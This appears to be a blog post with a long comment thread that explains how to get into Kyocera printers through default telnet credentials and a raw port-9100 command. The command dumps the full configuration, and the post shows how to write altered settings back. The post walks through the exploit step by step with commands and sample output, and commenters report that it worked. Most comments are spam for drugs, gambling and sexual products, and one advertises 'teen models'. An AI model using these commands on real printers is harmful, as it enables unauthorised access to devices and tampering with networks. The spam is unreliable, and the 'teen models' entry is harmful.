Kyocera Printers

Kyocera printers have various security flaws. Most of them can be telnetted to on the default port and accessed with the default username ‘admin’ and blank password. There is a very decent menu interface to change everything.

For the Kyocera 3830, which is a current model workgroup printer they disabled the telnetting to the default port for ’security’.
These printers, if they can be accessed, can provide up to around 100mb of storage, email facilities, networking information and various other details.

The 3830’s have a back door. Telnetting to port 9100 (the printer data port) allows you to send raw text to the printer, but if you drop the correct command in  at this point, you can get full access to the printers settings. So here we go.

Telnet to port 9100 of a 3830.

Drop in this command and save the output:

!R!SIOP0,”COMREADBACK:0″;EXIT;

This will give you output similar to this:

CMNT Offset 0x006a Size = 1 ; SIOP0,"CUSTOM:Network Status Page = 0";
CMNT Offset 0x006b Size = 1 ; SIOP0,"CUSTOM:TCP/IP BOOTP = 0";
CMNT Offset 0x006c Size = 1 ; SIOP0,"CUSTOM:TCP/IP Protocol = 1";
CMNT Offset 0x006d Size = 1 ; SIOP0,"CUSTOM:TCP/IP DHCP = 0";
CMNT Offset 0x006e Size = 1 ; SIOP0,"CUSTOM:RARP = 1";
CMNT Offset 0x006f Size = 1 ; SIOP0,"CUSTOM:ARP/PING = 1";
CMNT Offset 0x0070 Size = 4 ; SIOP0,"CUSTOM:IP Address = 172.16.1.212";
CMNT Offset 0x0074 Size = 4 ; SIOP0,"CUSTOM:Subnet Mask = 255.255.255.0";
CMNT Offset 0x0078 Size = 4 ; SIOP0,"CUSTOM:Default Gateway = 0.0.0.0";
CMNT Offset 0x007c Size = 256 ; SIOP0,"CUSTOM:Domain Name = ''";
CMNT Offset 0x017c Size = 4 ; SIOP0,"CUSTOM:DNS Server (Primary) = 0.0.0.0";
CMNT Offset 0x0180 Size = 4 ; SIOP0,"CUSTOM:DNS Server (Secondary) = 0.0.0.0";
CMNT Offset 0x0184 Size = 4 ; SIOP0,"CUSTOM:WINS Server (Primary) = 0.0.0.0";
CMNT Offset 0x0188 Size = 4 ; SIOP0,"CUSTOM:WINS Server (Secondary) = 0.0.0.0";
CMNT Offset 0x018c Size = 225 ; SIOP0,"CUSTOM:Scope ID = ''";
CMNT Offset 0x026d Size = 1 ; SIOP0,"CUSTOM:NetWare Protocol = 1";
CMNT Offset 0x026e Size = 1 ; SIOP0,"CUSTOM:Frame Type = 1";
CMNT Offset 0x026f Size = 1 ; SIOP0,"CUSTOM:Operation Mode = 1";
CMNT Offset 0x0270 Size = 32 ; SIOP0,"CUSTOM:Print Server Name = 'admin'";
CMNT Offset 0x0290 Size = 32 ; SIOP0,"CUSTOM:Login Password = ''";
CMNT Offset 0x02b0 Size = 2 ; SIOP0,"CUSTOM:Queue Polling Interval = 4";
CMNT Offset 0x02b2 Size = 1 ; SIOP0,"CUSTOM:NetWare Banner Page = 1";
CMNT Offset 0x02b3 Size = 1 ; SIOP0,"CUSTOM:Bindery Mode = 1";
CMNT Offset 0x02b4 Size = 32 ; SIOP0,"CUSTOM:File Server 1 = ''";

Now, if you want to change a setting just grab the part after the ‘offset ;’ section, insert your own text/ip address/whatever and throw it back on to the 9100 connection.

!R!SIOP0,”CUSTOM:LP1 End of Job String = ‘!R! RES; EXIT;’”;EXIT;

Your other option is to stick all the commands in a text file then do this from the unix prompt (without quotes):

lp -d”printername” “textfilename”

Done and done.

technorati tags: , , ,

62 Responses to “Kyocera Printers”

  1. crypt_k Says:

    First comment.
    good stuff, I will have to try this when i come across one in the future.

  2. MisterT Says:

    Tried it and worked. Command references for KM printers available(which can be sent to port 9100)? Any pointers? Thanks in advance.

  3. glub Says:

    Glub says:

    Without showing how to secure this loophole, this hack sends the wrong message. Master evader, you should know better, this will attract the black hats to your site, instead of the white. The printers are unsecured for a good reason, its boring. The consequence of teaching black hats to modify strings directly – script kiddies following you around.

  4. evader Says:

    MisterT: Any commands that appear in the COMREADBACK output can be pushed back to the printer to change settings. Have a look at my example again. It’s just the part after the ‘offset ;’ section.

    glub: Didn’t want anyone with a hat at my site. It’s just some notes really and it is un-securable currently. The best you can do is change the default port to something else instead of 9100. This won’t stop a port scan though. Take it easy mate.

  5. presscut Says:

    indeed, we were just under attack but luckly prevented this problem by changing the default password. however, you have to agree by saying that spreading such problems over the www without giving any solutions is totaly the wrong way.

  6. evader Says:

    I agree presscut, but there is no fix I could post currently. Kyocera know about the problem, and call it a feature.

  7. presscut Says:

    nevermind… as long as there are filthy of loopholes in windows itself ;)

  8. n00b Says:

    OTOH if they can fraking telnet to your printers, you DESERVE this !!!

  9. long beach hotels Says:

    long beach hotels

    upturning fliers NATOs factor regulative.stratify,overhead cheap hotel http://www.hotels-forum.com/

  10. ? Says:

    ?

    Download Cool Ringtone Right This Time: ?

  11. Buy Paxil Says:

    Buy Paxil

    Buy paxil Buy cheap Paxil online order cheap Paxil online. Paxil

  12. mens health Says:

    Bravo Kyocera Printers rules!

  13. Dave Says:

    Here is my comment it is a test

  14. dave the cricket Says:

    <font size=”+1″>Men’s Penis Guide</font>
    Penis enlargement pills, patches, extension devices and exercises reviewed by over 500 users. Find out if penis enlargement products actually work. <strong> <a href=”http://www.menspenisguide.com/” target=”_blank” > <BR> <font color=”blue” > <u>Click here to visit this penis enlargement website </u></font> </strong;> </a>

  15. dave the cricket Says:

    %20 hello

  16. Tourism Guide Says:

    Accommodations offers, ski offers, photos, travel maps, travel tips, monasteries and touristic objectives.

  17. Omaha Holdem Betting Says:

    Omaha Holdem Betting

    chasers thousandth combated.task!assigning

  18. chinese baby girl Says:

    chinese baby girl

    Catalogue of chinese baby girl.

  19. Gerneric Viagra Says:

    Gerneric Viagra

    cutoff optimization perish:quartile passive

  20. aim buddy free icon Says:

    aim buddy free icon

    Relevant aim buddy free icon

  21. fosamax 10 mcg Says:

    fosamax 10 mcg

    Reviews on fosamax 10 mcg.

  22. 13 17 teen models Says:

    13 17 teen models

    ka-ka-sh-ka 1065558 Relevant information about 13 17 teen models.

  23. TestQFE Says:

    EWFEF

  24. Purchase Cipro Online Says:

    Purchase Cipro Online

    Purchase Cipro Online

  25. Tamiflu Says:

    Tamiflu

    Tamiflu

  26. Purchase Depakote Online Says:

    Purchase Depakote Online

    Purchase Depakote Online

  27. Download free poker holdem survival kit Says:

    free poker holdem survival kit

    Some poker site offers a free download of the “Holdem Hustler Super Survival Kit” which did cost about 50 bucks. It includes free poker e-books and poker calculator. Well, it’s free anyway.

  28. full tilt bonus code Says:

    full tilt deposit bonus

    full tilt deposit code

  29. Anonymous Says:

    Cash Blitz Project

  30. credit cards low income Says:

    credit cards low income

    pros!hydrodynamics quiet styling conscription perspective

  31. wse Says:

    163

  32. OnenUnjunse Says:

    ONLINE – DRUGSTORE!
    PRICES of ALL MEDICINES!

    FIND THAT NECESSARY…
    VIAGRA, CIALIS, PHENTERMINE, SOMA… and other pills!

    Welcome please: pills-prices.blogspot.com

    NEW INFORMATION ABOUT PAYDAY LOANS!

    Welcome please: payday-d-loans.blogspot.com

    GOOD LUCK!

  33. WjgUquon Says:

    phetermine buy online
    phetermine buy online

  34. Frank the natural penis enlargement expert Says:

    great

    http://www.squidoo.com/natural-penis-enlargement-review

  35. bob Says:

    dCralv hi great site thx http://peace.com

  36. 100 free ringtones Says:

    mp3 ringtones free

    Do free polyphonic ringtones for verizon phone free polyphonic ringtones for lg vx6000

  37. Phentergirl Says:

    Very very interesting article! You describe very important theme. I’m going to discuss about it in my blog to my readers. Unfortunately I’m late to write the same article in my blog. In the web are a lot of same sites and blogs but your differs markedly of its profundity.

  38. advance bad cash credit loan loan advance bad cash credit loan payday bad credit cash advance Says:

    casino online italiano

    Inoltre vincere casino online scaricare video poker

  39. casino on line sicuri Says:

    gioco pc casino

    Giocare casino online italia casino italia gratis

  40. Cazare Brasov Says:

    “Kyocera printers have various security flaws. ” – this is not “various”, this is Huge securyty flaws.
    Thnx for valuable info.

  41. enlarge penis size Says:

    way to increase your penis into bigger and longer one

  42. Bhakti Says:

    Kyocera? I know kyocera, but its not a printer here, they sell cellphones than printer

  43. Search Says:

    great site

  44. Kyocera EP510DN printer at SonicChicken blog Says:

    [...] Not that it’ll do you much good–see previous note.) I’ve seen a pretty gnarly security exploit for Kyocera printers, which seems to bypass what little security is available, but I haven’t tested it on our unit [...]

  45. hp ink cartridges Says:

    I wouldn’t own one of these junky brands. Stick with hp or lexmark. Those are much better quality.

  46. ADT Home Security Says:

    ADT Home Security…

    ADT Home Security…

  47. Spermomax sexual enhancement Says:

    Spermomax sexual enhancement pills actually make you cum more.

  48. why kill Says:

    i like those printers.

  49. SMS Alerts Says:

    Rather interesting. Thanks for sharing this information, I’m looking into this and re reading again.

  50. emo Says:

    gonna try this hack

  51. Platzreife Says:

    Tried it and worked. Command references for KM printers available(which can be sent to port 9100)? Any pointers? Thanks in advance.

  52. Domain Says:

    I’ve never heard about this “Kyocera” printer, but if they have security flaws, the manufacturer should fix this. Thanks for sharing this information

  53. Manufactured Homes Says:

    Mobile Homes…

    Manufactured housing can be a quality and economic alternative to traditionally built homes in tight financial times….

  54. David Gortler Says:

    Thanks for this Kyocera Printers. This tutorial will really help mine.

  55. Ink cartridges Says:

    sweet… thanks…

  56. Cazare Bucuresti Says:

    Thank you for this article. It really worked for me

  57. Maria Mali Says:

    I have been reading some very interresting stuff here, Good info. thanks for the Web view and keep up the good job

    Maria

  58. Supply Chain Says:

    Thanks for the information. I will avoid Kyocera printers from now on

  59. Penis Enlargement|Best Penis Enlargement Says:

    Top 10 Penis Enlargement reviews and Penis Health Information – We list and review the top clinically proven penis enlargement

  60. Richard Says:

    Hey, you have a great blog here! I’m definitely going to bookmark you! Thank you for your info.And this is quick payday loan no credit check site/blog. It pretty much covers Quick payday loan no credit check related stuff. Thanks for sharing it!

  61. car accident lawyer jacksonville Says:

    i must say, your blog is very good, i will be checking back to read more

  62. Hp Ink Cartridge Says:

    “HP 11 Color Pack – High quality Compatible ink cartridges C4836AN cyan, C4837AN magenta and C4838AN yellow. We carry the highest quality products available in the market today. all the products are backed by our180-days satisfaction uarantee or your money back.
    Hp Ink Cartridge

Leave a Reply